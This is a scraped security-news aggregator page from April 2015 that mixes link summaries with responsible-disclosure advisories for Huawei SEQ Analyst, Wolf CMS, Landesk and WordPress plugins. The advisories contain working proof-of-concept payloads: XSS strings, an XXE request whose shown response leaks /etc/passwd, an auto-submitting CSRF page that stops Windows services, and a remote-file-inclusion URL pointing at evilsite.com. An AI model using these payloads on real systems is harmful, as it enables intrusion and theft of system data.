Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Huawei SEQ Analyst - Multiple Reflected Cross Site Scripting (XSS)

April 15, 2015, 3:34 pm
$
0
0
#Document Title:
============
Huawei SEQ Analyst - Multiple Reflected Cross Site Scripting (XSS)

#Release Date:
===========
15 Apr 2015

#CVE-ID:
=======
CVE-2015-2347

#Product & Service Introduction:
=======================
SEQ Analyst is a platform for business quality monitoring and management by
individual user and multiple vendors in a quasi-realtime and retraceable
manner
More Details & Manual ;
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101

#Vulnerability Disclosure Timeline:
========================
3 Mar 2015    Bug reported to the vendor.
6 Mar 2015    Vendor returned ; investigating
16 Mar 2015   Asked about the case.
16 Mar 2015   Vendor has validated the issue.
17 Mar 2015   There aren't any fix the issue.
18 Mar 2015   CVE number assigned
15 Apr 2015   Fixed

#Affected Product(s):
===============
Huawei Technologies Co. Ltd.
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be
vulnerable)

#Exploitation Technique:
=================
Local, Authenticated

#Technical Details:
========================
Sample Payload : 261e9<script>alert(1)</script>57114
Affected Path/Parameter: [4 parameter]
    /common/flexdata.action
        [command XML parameter]
    /monitor/flexdata.action
        [command XML parameter]
        [module XML parameter]
    /psnpm/flexdata.action
        [command XML parameter]

#Proof of Concept (PoC):
==================
https://drive.google.com/folderview?id=0B-LWHbwdK3P9fnBlLWZqWlZqNnB0b2xHWFpYUWt3bmY3Y0lPUHVLNm9VTUlFcWhYTHlZSUU&usp=sharing

#Solution Fix & Patch:
================
15 Apr 2015    Fixed version --> SEQ Analyst V200R002C03LG0001CP0022

#Credits & Authors:
==============
Ugur Cihan Koc
@_uceka_
www.uceka.com
Search

Huawei SEQ Analyst - XML External Entity Injection (XXE)

April 15, 2015, 3:35 pm
$
0
0
#Document Title:
============
Huawei SEQ Analyst - XML External Entity Injection (XXE)

#Release Date:
===========
15 Apr 2015

#CVE-ID:
=======
CVE-2015-2346

#Product & Service Introduction:
=======================
SEQ Analyst is a platform for business quality monitoring and management by
individual user and multiple vendors in a quasi-realtime and retraceable
manner
More Details & Manual ;
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101

#Vulnerability Disclosure Timeline:
========================
3 Mar 2015     Bug reported to the vendor.
6 Mar 2015     Vendor returned ; investigating
16 Mar 2015   Asked about the case.
16 Mar 2015   Vendor has validated the issue.
17 Mar 2015   There aren't any fix the issue.
18 Mar 2015   CVE number assigned
15 Apr 2015   Fixed

#Affected Product(s):
===============
Huawei Technologies Co. Ltd.
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be
vulnerable)

#Exploitation Technique:
=================
Local, Authenticated

#Technical Details:
========================
Target Path: /monitor/flexdata.action
Sample Payload : <!DOCTYPE foo [<!ENTITY xxe00c70 SYSTEM
"file:///etc/passwd"> ]>
Affected Parameter: req

#Proof of Concept (PoC):
==================
https://drive.google.com/file/d/0B-LWHbwdK3P9YnVvYXFFZWZKc0k/view?usp=sharing

Request:

POST /monitor/flexdata.action HTTP/1.1
Host: ***:8443
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3;
org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US;
locale=en_US; locked=false;
timeNum=1425365144829; timeState=true; loginUserName=testsms;
CASTGC=TGT-549-
skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false
Connection: keep-alive
Referer: https://
***:8443/monitor/flexrelease/AllNetMonitor.swf/[[DYNAMIC]]/5
Content-type: application/x-www-form-urlencoded
Content-Length: 136

req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<c
ommand>bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B020
0%202015

Response:

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 06:46:29 GMT
Server: Apache-Coyote/1.1
Cache- Control: no- cache, no-store
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 4281
<html>
<head>
<style type="text/css">

<tr class="row_even">
<td class="cell_object">1</td>
<td class="cell_object">2〕Command is
bizLicenseSettingnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:Daemon:/sbin:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/false
root:x:0:0:root:/root:/bin/bash
messagebus:x:103:101:User for D-Bus:/var/run/dbus:/bin/false
ntp:x:74:102:NTP daemon:/var/lib/ntp:/bin/false
ftpsecure:x:104:65534:Secure FTP User:/var/lib/empty:/bin/false
polkituser:x:105:103:PolicyKit:/var/run/PolicyKit:/bin/false
haldaemon:x:106:104:User for haldaemon:/var/run/hald:/bin/false
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
webserver:x:360:1800::/home/webserver:/bin/bash
ecmftp:x:1000:1800::/opt/pub/software:/bin/bash
ftptest:x:1001:1800::/opt/webserver/workspaces/ftp:/bin/bash
httpd:x:361:1801::/home/httpd:/bin/bash
cognos:x:1002:1802::/home/cognos:/bin/bash
ftptrace:x:1003:1800::/opt/webserver/workspaces/ftp/traceserver:/bin/bash
ftpsoc:x:1004:1800::/opt/pub/software:/bin/bash
ftprtmu:x:1005:1800::/opt/webserver/workspaces/ftp/rtmu:/bin/bash</td>
</tr>
<tr class="row_odd">
...

#Solution Fix & Patch:
================
15 Apr 2015    Fixed version --> SEQ Analyst V200R002C03LG0001CP0022

#Credits & Authors:
==============
Ugur Cihan Koc
@_uceka_
www.uceka.com

PCI COUNCIL PUBLISHES REVISION TO PCI DATA SECURITY STANDARD

April 15, 2015, 5:10 pm

Golang data races to break memory safety

April 15, 2015, 10:23 pm
$
0
0
Go is becoming more and more popular as a programming language and getting more scrutiny from a security point of view. You might remember my heap corruption during garbage collection post. A few days ago Scott Piper wrote Looking for security trouble spots in Go code, an interesting read.

I'd like to expand on a topic I've researched a few months ago after discussing with Dmitry Vyukov (ASAN, TSAN, core Go contributor). He mentioned once on the public Go mailing list that you can break the memory safety of Go with data races, and it piqued my interest so we'll explore that in this post with some exploits.


RpcView 0.1.5 released

April 16, 2015, 2:14 am

Dropbox users continue to unwittingly leak tax returns and other private data

April 16, 2015, 3:21 am
$
0
0
Readers with good memories will recall a worrying privacy hole was found in Dropbox after publicly accessible links to private personal information stored on the service leaked out to unauthorised users.

The issue was stumbled across by rival file-sharing service Intralinks, which focuses on the enterprise market.

more here.........https://grahamcluley.com/2015/04/dropbox-leak-tax-return/

Impacket

April 16, 2015, 4:01 am
$
0
0
Impacket is a collection of Python classes for working with network
protocols. Impacket is mostly focused on providing low-level
programmatic access to the packets, however some protocols (for
instance NMB and SMB) are implemented in a higher level as a
foundation for other protocols. Packets can be constructed from
scratch, as well as parsed from raw data, and the object oriented API
makes it simple to work with deep hierarchies of protocols.

Impacket is most useful when used together with a packet capture
utility or package such as Pcapy, an object oriented Python extension
for capturing network packets.

more here.......https://github.com/CoreSecurity/impacket

Introducing Burp Collaborator

April 16, 2015, 6:23 am
$
0
0
Today's release of Burp Suite introduces Burp Collaborator. This new feature has the potential to revolutionize web security testing. Over time, Burp Collaborator will enable Burp to detect issues like blind XSS, server-side request forgery, asynchronous code injection, and various as-yet-unclassified vulnerabilities.

In the coming months, we will be adding many exciting new capabilities to Burp, based on the Collaborator technology. See the "Release roadmap" section towards the end of this post for more details.

This blog post looks at:
Some important limitations of the conventional web testing model.
How Burp Collaborator will address these limitations.
Lots of real-world vulnerabilities that don't fit into the usual classifications.

more here.....http://blog.portswigger.net/2015/04/introducing-burp-collaborator.html
Search

Integrating Moloch & Cuckoo Sandbox

April 16, 2015, 7:25 am
$
0
0
Moloch is a powerful network capture and indexing system which is increasingly commonly used in corporate networks to monitor traffic and identify malicious activity.
By integrating Cuckoo and Moloch, we'd be able to create a fully open source sandnet capable of extracting malicious artifacts on-the-fly and requesting Cuckoo to analyze them.

more here........https://github.com/cuckoobox/cuckoo/issues/523

Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability

April 16, 2015, 7:28 am
$
0
0 
 ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /        
  / XXXXXX /
 (________(          
  `------'

 Exploit Title   : Wolf CMS Arbitrary File Upload Exploit
 Date            : 16 April 2015
 Exploit Author  : CWH Underground
 Discovered By   : ZeQ3uL
 Site            : www.2600.in.th
 Vendor Homepage : https://www.wolfcms.org/
 Software Link   : https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.2.zip
 Version         : 0.8.2

####################
SOFTWARE DESCRIPTION
####################

Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3. 
Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS.

#######################################
VULNERABILITY: Arbitrary File Upload
#######################################

This exploit a file upload vulnerability found in Wolf CMS 0.8.2, and possibly prior. Attackers can abuse the
upload feature in order to upload a malicious PHP file into the application with authenticated user, which results in 
arbitrary remote code execution.

The vulnerability was found on File Manager Function (Enabled by default), which provides interfaces to manage files 
from the administration. 

In this simple example, there are no restrictions made regarding the type of files allowed for uploading. 
Therefore, an attacker can upload a PHP shell file with malicious code that can lead to full control of a victim 
server. 
Additionally, the uploaded file can be moved to the root directory, meaning that the attacker can access it through the 
Internet.

/wolf/plugins/file_manager/FileManagerController.php (LINE: 302-339)
-----------------------------------------------------------------------------
// Clean filenames
        $filename = preg_replace('/ /', '_', $_FILES['upload_file']['name']);
        $filename = preg_replace('/[^a-z0-9_\-\.]/i', '', $filename);

        if (isset($_FILES)) {
            $file = $this->_upload_file($filename, FILES_DIR . '/' . $path . '/', $_FILES['upload_file']['tmp_name'], 
$overwrite);

            if ($file === false)
                Flash::set('error', __('File has not been uploaded!'));
        }
-----------------------------------------------------------------------------

#####################
Disclosure Timeline
#####################

[04/04/2015] – Issue reported to Developer Team
[08/04/2015] – Discussed for fixing the issue

################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################

[CVE-2014-5361][CVE-2014-5362]Landesk Management Suite RFI & CSRF Security Vulnerabilities

April 16, 2015, 7:28 am
$
0
0 
Exploit Title: Landesk Management Suite RFI and CSRF vulnerabilities
Product: Landesk Management Suite
Vulnerable Versions: 9.5 (and possible previous versions), 9.6
Tested Version: 9.5
Advisory Publication: 16/04/2015
Latest Update: 16/04/2015
Vulnerability Type: Cross-site request forgery [CWE-352], Remote File Inclusion [CWE-829]
CVE Reference: CVE-2014-5361, CVE-2014-5362
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------

Vendor:
LANDESK

Product & Version:
Landesk Management Suite v9.5

Vendor URL & Download:
http://www.landesk.com/products/management-suite/

Product Description:
"Manage all your users’ multi-platform desktops and mobile devices. Integrate several IT disciplines
into a single management experience that speeds software distribution, ensures software license compliance,
simplifies OS provisioning, saves power costs, provides secure remote control, and manages Mac OS X."


(2) Vulnerability Details:
--------------------------
The admin interface of Landesk Management Suite can be exploited by Remote File Inclusion (RFI) and Cross-site Request 
forgery (CSRF) attacks.

Proof of concept for CSRF [CVE-2014-5361]:
-----------------------------------------
URL: 
https://<LANDESK>/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT
Attack Pattern: 

Certain functionalities of landesk are vulnerable to cross-site request forgeries, which can be used to force users to, 
among other things,
manipulate windows services and processes on  host machines. 

Example code below:
<!-- CSRF for Landesk, allowing stop, start or restart of arbitrary services OR processes on host machine -->
<html>
<head>
<script>
<!-- For illustration only, Skype and Adobe Acrobat Update Services are shut down / Replace with any windows service on 
host machine -->
window.onload = function() {
        document.getElementById("csrfForm1").submit();
        document.getElementById("csrfForm2").submit();
        }

</script>
</head>
<body>
<form id="csrfForm1" 
action="https://landesk/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT";
 method="POST" enctype="multipart/form-data" target="csrfIframe1">
<input type="hidden" name="op" value="stop" />
<input type="hidden" name="name" value="Adobe Acrobat Update Service" />
</form>

<form id="csrfForm2" 
action="https://landesk/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT";
 method="POST" enctype="multipart/form-data" target="csrfIframe2">
<input type="hidden" name="op" value="stop" />
<input type="hidden" name="name" value="Skype Updater" />
</form>

<iframe style="display:hidden" height="0" width="0" frameborder="0" name"csrfIframe1"></iframe>   
<iframe style="display:hidden" height="0" width="0" frameborder="0" name"csrfIframe2"></iframe>
</body>
</html>


Proof of concept for RFI [CVE-2014-5362]:
-----------------------------------------

There are numerous URLs within the landesk management suite that can be used to call upon remote files due to the use 
of relative paths.
This can be leveraged to introduce remote file inclusion vulnerabilities as you can present external content through 
the landesk server.

URLs:
https://<LANDESK>/ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=//<RFI here>
https://<LANDESK>/remote/frm_coremainfrm.aspx?tb=cust_qry.tb&d=//<RFI 
here>&bfn=swd_top&node=4&baseType=group1&groupID=1646&groupType=null&ownerID=56
https://<LANDESK>/remote/frm_splitfrm.aspx?top=//<RFI 
here>&ttb=dirman.tb&ftr=frm_tasktabsfrm&tabf=dirman_tabs&tf=dirman_top&bottom=frm_taskfrm&bbd=SoftwareDistribution/ldaplist&bf=dirlist_bottom&bd=frm_coremainfrm&btb=dirlist.tb&pct=50

Parameter names: "d" & "top"
Parameter Type: GET
Attack Pattern:
The Remote File must finish in .aspx but the extension is not referenced explicitly in the URL. It will be fetched in 
HTTPS.
d=//<any external URL here>/<filenamehere>(.aspx)
example:
https://<LANDESK>/ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=//evilsite.com/myevilaspxfile


(3) Advisory Timeline:
----------------------
15/09/2014 - First Contact
23/10/2014 - Request for update on fix. No ETA given.
21/11/2014 - Request for update on fix. No ETA given.
22/12/2014 - Request for update on fix. No ETA given.
22/01/2015 - Request for update on fix. No ETA given.
13/04/2015 - Final request for update and notice of public disclosure given. No ETA for fix.
16/04/2015 - Public disclosure

(4)Solution:
------------
No fix at this time.


(5) Credits:
------------
Discovered by Alex Haynes

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5361
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5361
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5362

e-LockPicking: Opening Electronic Doors

April 16, 2015, 10:13 am
$
0
0
I bought this lock under the brand of Tafta2015-04-07 00.54.05 but it seems the the original manufacturer, which seems to OEM it, is SoHoMiLL YL-99 Electronic Door (pointed by @revskills).

It is basically a lock which runs on batteries and allows the user to store different code entries. The master code, which has to start with 0, is the one that allows you to change the entry code of any other user (codes start from 1 to 9, so it can have 9 different codes besides the master one). We will later see why each of them starts with a different number.

more here.......http://www.gabrielgonzalezgarcia.com/2015/04/15/e-lockpicking-opening-electronic-doors/

Tuning auditd: High Performance Linux Auditing

April 16, 2015, 10:17 am
$
0
0
The Linux Audit framework is a powerful tool to audit system events. From running executables up to system calls, everything can be logged. However, all this audit logging comes at the price of performance. In this article we have a look how we can optimize our audit rules, and keep our Linux system running smoothly.

Good auditd performance will reduce stress on the Linux kernel and lower its impact. Before changing anything to your system, we suggest to benchmark your system performance before and after. This way you can see the benefits of your tuning efforts.

more here....http://linux-audit.com/tuning-auditd-high-performance-linux-auditing/

Freeware: ArkDasm 64-bit interactive disassembler and debugger

April 16, 2015, 10:24 am

Operation Pawn Storm Ramps Up its Activities; Targets NATO, White House

April 16, 2015, 10:27 am
$
0
0
Long-running APT campaign Operation Pawn Storm has begun the year with a bang, introducing new infrastructure and zeroing in on targets including North Atlantic Treaty Organization (NATO) members and even the White House. This is according to the latest intelligence gleaned from Trend Micro’s ongoing research into the attack group, and comes as a follow-up to our widely publicized October 2014 report.

more here........http://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-ramps-up-its-activities-targets-nato-white-house/
Search

Fidelis Threat Advisory #1016: Pushdo It To Me One More Time

April 16, 2015, 10:30 am
$
0
0
Once thought to be defunct, the resilient Pushdo has surfaced with infections observed in more than 50 countries, with a substantial infection rate located in the Asia-Pacific region.  Based on data aggregated from a controlled sinkhole, Fidelis Cybersecurity has observed some notable changes with the primary command and control (C&C) and conducted in-depth analysis of the secondary C&C Domain Generation Algorithim (DGA).  In order to support network defenders, Fidelis Cybersecurity is offering a new, free data feed of verified indicators to support the detection and mitigation of Pushdo. Our intention behind revealing these details is to enable widespread detection and remediation of this threat as well as to force a comprehensive retooling exercise on the operators of the Pushdo botnet.

more here.........http://www.threatgeek.com/2015/04/fidelis-threat-advisory-1016-pushdo-it-to-me-one-more-time.html

GlassWire 1.0.44 Beta

April 16, 2015, 10:36 am

CSRF and stored XSS in WordPress Content Slide allow an attacker to have full admin privileges (WordPress plugin)

April 16, 2015, 10:42 am
$
0
0
Details
================
Software: Wordpress Content Slide
Version: 1.4.2
Homepage: http://wordpress.org/plugins/content-slide/
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-wordpress-content-slide-allow-an-attacker-to-have-full-admin-privileges/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)

Description
================
CSRF and stored XSS in WordPress Content Slide allow an attacker to have full admin privileges

Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript:
A CSRF vulnerability allows an attacker to change any option in the plugin. The plugin does not escape content when put into HTML so the attacker can then use JavaScript to perform almost any action an admin can take (including creating new users, executing arbitrary php through the theme editor or exploiting vulnerabilities in WordPress or other plugins which normally require the user to be authenticated as an admin).

Proof of concept
================
While logged into a site with the plugin enabled open a page containing the following form and click the submit button (in a real attack the form could be made to auto-submit):
<form action=\"http://localhost/wp-admin/admin.php?page=content-slide/content_slide.php\" method=\"POST\">
  <input type=\"text\" name=\"wpcs_options[no_of_custom_images]\" value=\"1\">
  <input type=\"text\" name=\"wpcs_options[slide_image1]\" value=\"&quot;>&lt;script>alert(1)&lt;/script>\">
  <input type=\"submit\">
</form>
If using a browser without reflected XSS mitigation (e.g. Chrome) the admin user will see “1” in an alert box, otherwise a refresh of the page is required before the JavaScript is executed.

Mitigations
================
Disable the plugin until a new version is released that fixes this bug
At the time of publishing no fix is available and the plugin has been removed from the plugin directory

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2014-10-08: Discovered
2014-12-16: Reported to vendor via email form at http://www.snilesh.com/contact-me/
2014-12-16: Requested CVE
2015-01-07: Vendor responded
2015-01-09: Vendor chased
2015-04-09: Vendor had given assurances that a fix would be available, and was given multiple extensions to do so, but by this point they had stopped responding. Emailedplugins@wordpress.org requesting a takedown.
2015-04-16: Confirmed that the plugin is no longer on the directory. Published.



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

Reflected XSS in Citizen Space allows attackers to view sensitive information of the attacker’s choosing (WordPress plugin)

April 16, 2015, 10:57 am
$
0
0
Details
================
Software: Citizen Space
Version: 1.1
Homepage: http://wordpress.org/plugins/citizen-space/
Advisory report: https://security.dxw.com/advisories/reflected-xss-in-citizen-space-allows-attackers-to-view-sensitive-information-of-the-attackers-choosing/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:P/A:N)

Description
================
Reflected XSS in Citizen Space allows attackers to view sensitive information of the attacker’s choosing

Vulnerability
================
It is possible to request pages that will run the attackers choice of WordPress short code and display any content of the attackers choosing. This allows the attacker to view extremely sensitive data, to create content, to access forms that have been disabled and to greatly aid the exploitation of other plugins.
This can also be exploited to perform simple cross site scripting attacks (XSS) by injecting html onto pages, if a user can be tricked into following a link constructed by the attacker. This could be used e.g. to damage the reputation of the site or another entity, or to trick the user into installing malicious software
Citizen Space looks at all urls requested on the site to see if they contain “cs_consultation” anywhere in the url including in the parameters. It then looks for the parameter path in the url, if it is found it appends into post_content with out sanitising it
$post->post_content= \'[citizenspace_consultation url=\"\'.$_GET[\'path\'].\'\"]\';
This means that the citizenspace_consultation shortcode can be broken out off by adding square brackets (]). This works because the spec for shortcodes in WordPress is strict and says there can not be any closing square brackets inside a shortcode. Any content that is placed in the path parameter after the square bracket will be searched for short codes and if they are found they are executed. HTML will also be rendered and javascript will be executed.

Proof of concept
================
Assuming a site running on localhost, making this request will inject [shortcodehere] into the page.
http://localhost/?cs_consultation&path=\"][shortcodehere][[[

Mitigations
================
Disable and remove the plugin. The plugin authors (Delib) have deprecated the plugin and removed it from the plugin directory. They no longer recommend it as a way of integrating Citizen Space with WordPress:
https://delib.zendesk.com/hc/en-us/articles/203432169-Citizen-Space-Wordpress-plug-in
https://delib.zendesk.com/hc/en-us/articles/203432149-How-do-I-integrate-Citizen-Space-into-my-existing-website-

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================
2015-01-30: Discovered
2015-03-04: CVE requested
2015-03-05: Reported to vendor by email
2015-03-12: Confirmed plan for deprecation
2015-03-31: Plugin confirmed deprecated and removed from WP.org.
2015-04-16: Published
 
 
 


Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.

How do we build encryption backdoors?

April 16, 2015, 1:22 pm
$
0
0
They say that history repeats itself, first as tragedy, then as farce. Never has this principle been more apparent than in this new piece by Washington Post reporters Ellen Nakashima and Barton Gellman: 'As encryption spreads, U.S. grapples with clash between privacy, security'.

The subject of the piece is a renewed effort by U.S. intelligence and law enforcement agencies to mandate 'backdoors' in modern encryption systems. This is ostensibly a reaction to the mass adoption of strong encryption in smartphones, and a general fear that police are about to lose wiretapping capability they've come to depend on.

more here.........http://blog.cryptographyengineering.com/2015/04/how-do-we-build-encryption-backdors.html
Viewing all 8064 articles
Browse latest View live
Search